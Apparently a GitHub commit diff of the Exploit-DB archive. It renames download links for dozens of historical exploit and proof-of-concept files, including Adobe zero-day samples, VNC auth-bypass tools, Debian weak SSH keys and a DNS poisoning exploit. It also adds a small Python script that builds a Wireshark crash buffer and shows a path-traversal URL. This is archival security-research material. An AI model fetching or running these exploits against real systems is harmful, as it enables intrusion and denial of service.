|
||||
|
||||
|
|
|
|||
|
|
@ -168,4 +168,4 @@ An attacker can exploit this issue to execute arbitrary malicious code in the co
|
|||
|
||||
LibTIFF 3.8.2 is vulnerable; other versions may be affected as well.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-35451.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10205.zip (2009-11-22-35451.zip)
|
||||
|
|
@ -45,4 +45,4 @@ Not Vulnerable:
|
|||
Firefox 3.5.3 on Windows crashed once but not reliably.
|
||||
|
||||
PoC Packagetx:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Dr_IDE_ScaryMovie_Study.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11142.zip (Dr_IDE_ScaryMovie_Study.zip)
|
||||
|
|
|
|||
|
|
@ -69,7 +69,7 @@ Multi-Computer Virtual Whiteboard and so on.
|
|||
|
||||
http://aluigi.org/poc/qtsslame.zip
|
||||
or
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/qtsslame.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14268.zip (qtsslame.zip)
|
||||
|
||||
|
||||
#######################################################################
|
||||
|
|
|
|||
|
|
@ -9,7 +9,7 @@ Website : http://www.itsecteam.com
|
|||
Forum : http://forum.ITSecTeam.com
|
||||
---------------------------------------------------------------------------
|
||||
Advisory URL: http://itsecteam.com/en/papers/paper11.htm
|
||||
POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/adb_poc.zip
|
||||
POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14761.zip (adb_poc.zip)
|
||||
---------------------------------------------------------------------------
|
||||
System Affected:
|
||||
Adobe Acrobat reader 7.x
|
||||
|
|
|
|||
|
|
@ -7,7 +7,7 @@
|
|||
|_| |_|\____/_/ \_\____/|____/
|
||||
|
||||
http://www.exploit-db.com/moaub-23-adobe-acrobat-and-reader-newfunction-remote-code-execution-vulnerability/
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-23-exploit.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15086.zip (moaub-23-exploit.zip)
|
||||
'''
|
||||
|
||||
'''
|
||||
|
|
|
|||
|
|
@ -284,7 +284,7 @@ With similar PoC we can try attack ftp.adobe.com, ftp.openbsd.org etc.
|
|||
|
||||
0day remote ftpd Denial-of-Service:
|
||||
http://cxib.net/stuff/glob-0day.c
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/glob-0day.c
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15215.c (glob-0day.c)
|
||||
|
||||
- --- 3. Fix ---
|
||||
Oracle 25.09.2010 CET: Being fixed in main codeline
|
||||
|
|
|
|||
|
|
@ -64,7 +64,7 @@ The effects of the problem can be:
|
|||
|
||||
|
||||
http://aluigi.org/poc/soliddb_1.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/soliddb_1.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15261.zip
|
||||
|
||||
#######################################################################
|
||||
|
||||
|
|
|
|||
|
|
@ -6,4 +6,4 @@ Exploiting this issue may allow attackers to crash the application and deny serv
|
|||
|
||||
This issue affects Wireshark 1.2.0 through 1.2.12 and 1.4.0 through 1.4.1.
|
||||
|
||||
PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15676_pcap.zip
|
||||
PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15676-pcap.zip
|
||||
|
|
@ -93,7 +93,7 @@ memory location:
|
|||
|
||||
|
||||
http://aluigi.org/testz/udpsz.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/udpsz.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15707.zip (udpsz.zip)
|
||||
|
||||
udpsz -C "00004b14 00000000 00000001 00000000 0001 0000" -b 0x61 -T SERVER 9001 0x4b18
|
||||
|
||||
|
|
|
|||
|
|
@ -6,4 +6,4 @@ Attackers can exploit this issue to cause the application to enter an infinite l
|
|||
|
||||
Wireshark 1.4.0 to 1.4.1 are vulnerable.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/44986.pcap
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15973.pcap (44986.pcap)
|
||||
|
|
@ -18,5 +18,5 @@ Author: Luigi Auriemma
|
|||
|
||||
#######################################################################
|
||||
|
||||
Backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04232006-openttdx.zip
|
||||
Backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1709.zip (04232006-openttdx.zip)
|
||||
|
||||
|
|
|
|||
|
|
@ -46,4 +46,4 @@ $phar = new Phar(dirname(__FILE__) . '/poc.phar.tar');
|
|||
|
||||
?>
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/poc.phar.tar
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17201.phar.tar (poc.phar.tar)
|
||||
|
|
@ -1,5 +1,5 @@
|
|||
# libextractor <= 0.5.13 Multiple Heap Overflow PoC Exploits
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05172006-libextho.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1801.zip (05172006-libextho.zip)
|
||||
|
||||
# milw0rm.com [2006-05-17]
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
# netPanzer 0.8 rev 952 (frameNum) Server Terminiation Exploit
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05232006-panza.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1820.zip (05232006-panza.zip)
|
||||
|
||||
# milw0rm.com [2006-05-23]
|
||||
|
|
|
|||
|
|
@ -3,6 +3,6 @@ Damian Put pucik[at]gazeta.pl
|
|||
pucik[@]overflow.pl
|
||||
http://overflow.pl
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10172006-clam_petite_heap.exe.bz2
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2587.exe.bz2 (10172006-clam_petite_heap.exe.bz2
|
||||
|
||||
# milw0rm.com [2006-10-17]
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
Sophos Antivirus CHM File Heap Overflow Vulnerability
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12092006-sophos_chunkheap.chm
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2910.chm (12092006-sophos_chunkheap.chm)
|
||||
|
||||
# milw0rm.com [2006-12-10]
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
Sophos Antivirus CHM Chunk Name Length Memory Corruption Vulnerability
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12092006-sophos_namelen.chm
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2911.chm (12092006-sophos_namelen.chm)
|
||||
|
||||
# milw0rm.com [2006-12-10]
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
Multiple Vendor Antivirus RAR File Denial of Service Vulnerability
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12102006-sophos_intifiniti.rar
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2912.rar (12102006-sophos_intifiniti.rar)
|
||||
|
||||
# milw0rm.com [2006-12-10]
|
||||
|
|
|
|||
30
platforms/multiple/dos/36840.py
Executable file
30
platforms/multiple/dos/36840.py
Executable file
|
|
@ -0,0 +1,30 @@
|
|||
#!/usr/bin/python
|
||||
# EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC
|
||||
# AUTHOR: Avinash Kumar Thapa "-Acid"
|
||||
# Date of Testing: 26th April'2015
|
||||
# Vendor Homepage: http://www.wireshark.org
|
||||
# Tested On : Windows 8.1 Pro
|
||||
# Steps to Reproduce the Crash
|
||||
# Step 1: Create a File Using PoC
|
||||
# Step 2: Go to wirehshark and in filter field, put ip.addr=={Buffer}
|
||||
# Step 3: Click "Apply"
|
||||
# Some other places for the Crash are:
|
||||
# Statistics > IP Statistics then any of the field you can use.
|
||||
# Statistics > Packet Length > Paste the buffer in the field
|
||||
# Statistics > ANCP
|
||||
# Statistics > Collectd
|
||||
# Statistics > Compared
|
||||
# Statistis >
|
||||
|
||||
|
||||
buffer = "A"*80000
|
||||
|
||||
file = open("wireshark.txt","w")
|
||||
file.write(buffer)
|
||||
file.close()
|
||||
|
||||
print "POC Created by -Acid"
|
||||
print " Email: acid.exploit@gmail.com"
|
||||
|
||||
|
||||
|
||||
|
|
@ -1,6 +1,6 @@
|
|||
Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit
|
||||
Author: RoMaNSoFt <roman@rs-labs.com>
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11022007-DoS-CVE-2007-5365.tgz
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz)
|
||||
|
||||
# milw0rm.com [2007-11-02]
|
||||
|
|
|
|||
|
|
@ -112,7 +112,7 @@ to write to the log file (max 1023 bytes) in a buffer of only 500.
|
|||
|
||||
|
||||
http://aluigi.org/poc/asgulo.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-asgulo.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5229.zip (2008-asgulo.zip)
|
||||
|
||||
A]
|
||||
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+..\../..\boot.ini
|
||||
|
|
|
|||
|
|
@ -12,6 +12,6 @@ Microsoft Visio on windows: unaffected
|
|||
It is unknown at this time whether code execution is possible...
|
||||
"""
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-www.NoiseBridge.net.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6029.zip (2008-www.NoiseBridge.net.zip)
|
||||
|
||||
# milw0rm.com [2008-07-08]
|
||||
|
|
|
|||
|
|
@ -17,6 +17,6 @@ your scanner hanging, woops.
|
|||
--
|
||||
kokanin
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-snot.zip.bla
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6174.zip (2008-snot.zip.bla)
|
||||
|
||||
# milw0rm.com [2008-07-31]
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
NULL pointer in Ventrilo 3.0.2
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-ventrilobotomy.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6237.zip (2008-ventrilobotomy.zip)
|
||||
|
||||
# milw0rm.com [2008-08-13]
|
||||
|
|
|
|||
|
|
@ -56,7 +56,7 @@ Credit : g_ (g_ # orange-bat # com)
|
|||
|
||||
|
||||
http://www.orange-bat.com/adv/2008/vlc.dos.tta
|
||||
backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-vlc.dos.tta
|
||||
backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6252.tta (2008-vlc.dos.tta)
|
||||
|
||||
- - PGP -
|
||||
|
||||
|
|
|
|||
|
|
@ -8,6 +8,6 @@ with a malformed Tamosoft CommView .ncf packet capture:
|
|||
Err file wtap.c: line 620 (wtap_read): assertion failed:
|
||||
(wth->phdr.pkt_encap != WTAP_ENCAP_PER_PACKET)
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-wireshark.ncf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6622.ncf (2008-wireshark.ncf)
|
||||
|
||||
# milw0rm.com [2008-09-29]
|
||||
|
|
|
|||
|
|
@ -2,6 +2,6 @@
|
|||
|
||||
// k`sOSe - works both in windows and linux
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-ffox-poc.tar.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8285.tar.gz (2009-ffox-poc.tar.gz)
|
||||
|
||||
# milw0rm.com [2009-03-25]
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
Acrobat <= 9.1.1 Stack Overflow Crashy PoC
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-crashy_the_clown.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8826.pdf (2009-crashy_the_clown.pdf)
|
||||
|
||||
# milw0rm.com [2009-05-29]
|
||||
|
|
|
|||
|
|
@ -121,4 +121,4 @@ VMWare ESX Server 4.0 ESX400-200909401
|
|||
VMWare ESX Server 3.5 ESX350-200910401
|
||||
VMWare ACE 2.5.3 Build 185404
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-vmware86.tar.gz
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz)
|
||||
|
|
@ -114,4 +114,4 @@ Ghostscript Ghostscript 8.56
|
|||
Ghostscript Ghostscript 8.54
|
||||
Ghostscript Ghostscript 8.15
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-12-05-34340.ps
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10326.ps (2009-12-05-34340.ps)
|
||||
|
|
@ -146,5 +146,5 @@ Avaya Intuity AUDIX LX 2.0
|
|||
Avaya Intuity AUDIX LX 1.0
|
||||
Avaya Intuity AUDIX
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-12-05-34337.pdf
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf)
|
||||
|
||||
|
|
|
|||
|
|
@ -9,6 +9,6 @@ NOTE: This was taken out of live malware and was not modified. BEWARE.
|
|||
|
||||
By visiting the following link, you agree that you are responsible for any damages that occur.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/adobe-0day-2010-1297.tar.enc
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13787.tar.enc (adobe-0day-2010-1297.tar.enc)
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -15,6 +15,6 @@ xx vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx
|
|||
os->flush();
|
||||
vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType); }
|
||||
|
||||
Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05162006-BL4CK-vncviewer-authbypass.rar
|
||||
Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar)
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -1,8 +1,8 @@
|
|||
class101 - http://heapoverflow.com
|
||||
RealVNC 4.1.0 - 4.1.1 (VNC Null Authentication) Vulnerability Scanners
|
||||
---------------------------------------------------------------------
|
||||
windows: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05172006-VNC_bypauth-win32.rar
|
||||
linux: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05172006-VNC_bypauth-linux.tar.gz
|
||||
windows: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-1.rar (05172006-VNC_bypauth-win32.rar)
|
||||
linux: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-2.rar (05172006-VNC_bypauth-linux.tar.gz)
|
||||
comments: http://heapoverflow.com/viewtopic.php?p=1729
|
||||
---------------------------------------------------------------------
|
||||
|
||||
|
|
|
|||
|
|
@ -25,4 +25,4 @@ Enjoy :>
|
|||
|
||||
/Kingcope
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/tomcat-remote.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18619.zip (tomcat-remote.zip)
|
||||
|
|
@ -1,3 +1,3 @@
|
|||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/x2.tgz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/349.tgz (x2.tgz)
|
||||
|
||||
# milw0rm.com [2002-05-01]
|
||||
|
|
|
|||
|
|
@ -70,7 +70,7 @@ vulnerability are in the fantasy of the attacker...
|
|||
|
||||
|
||||
http://aluigi.org/poc/sapone.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-sapone.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4877.zip (2008-sapone.zip)
|
||||
|
||||
|
||||
#######################################################################
|
||||
|
|
|
|||
|
|
@ -12,7 +12,7 @@ On an unpatched system, which doesn't need to be debian, do the following:
|
|||
keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
|
||||
|
||||
1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/debian_ssh_rsa_2048_x86.tar.bz2
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
|
||||
|
||||
2. Extract it to a directory
|
||||
|
||||
|
|
|
|||
|
|
@ -13,8 +13,8 @@
|
|||
#
|
||||
# Common Keys:
|
||||
#
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/debian_ssh_dsa_1024_x86.tar.bz2
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/debian_ssh_rsa_2048_x86.tar.bz2
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2)
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
|
||||
#
|
||||
#
|
||||
# Usage:
|
||||
|
|
|
|||
|
|
@ -9,6 +9,6 @@
|
|||
# #
|
||||
#############################################################################
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-snmpv3_exp.tgz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5790.tgz (2008-snmpv3_exp.tgz)
|
||||
|
||||
# milw0rm.com [2008-06-12]
|
||||
|
|
|
|||
|
|
@ -36,6 +36,6 @@ So, if you have a GigE lan, any trojaned machine can poison your DNS during one
|
|||
|
||||
original source: http://tservice.net.ru/~s0mbre/blog/2008/08/08/
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-dns-bind.tgz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6236.tgz (2008-dns-bind.tgz)
|
||||
|
||||
# milw0rm.com [2008-08-13]
|
||||
|
|
|
|||
|
|
@ -87,4 +87,4 @@ For more information, please visit www.cybsec.com
|
|||
======================================================
|
||||
Download:
|
||||
======================================================
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CYBSEC-Advisory2010-0102-FreePBX_2_5_x-2_6_Permanent_XSS.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11184.pdf (CYBSEC-Advisory2010-0102-FreePBX_2_5_x-2_6_Permanent_XSS.pdf)
|
||||
|
|
@ -94,4 +94,4 @@ For more information, please visit www.cybsec.com
|
|||
===========================================================================
|
||||
Download:
|
||||
===========================================================================
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CYBSEC-Advisory2010-0103-FreePBX_2_5_1_SQL_Injection.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11186.pdf (CYBSEC-Advisory2010-0103-FreePBX_2_5_1_SQL_Injection.pdf)
|
||||
Some files were not shown because too many files have changed in this diff Show more
Loading…
Add table
Reference in a new issue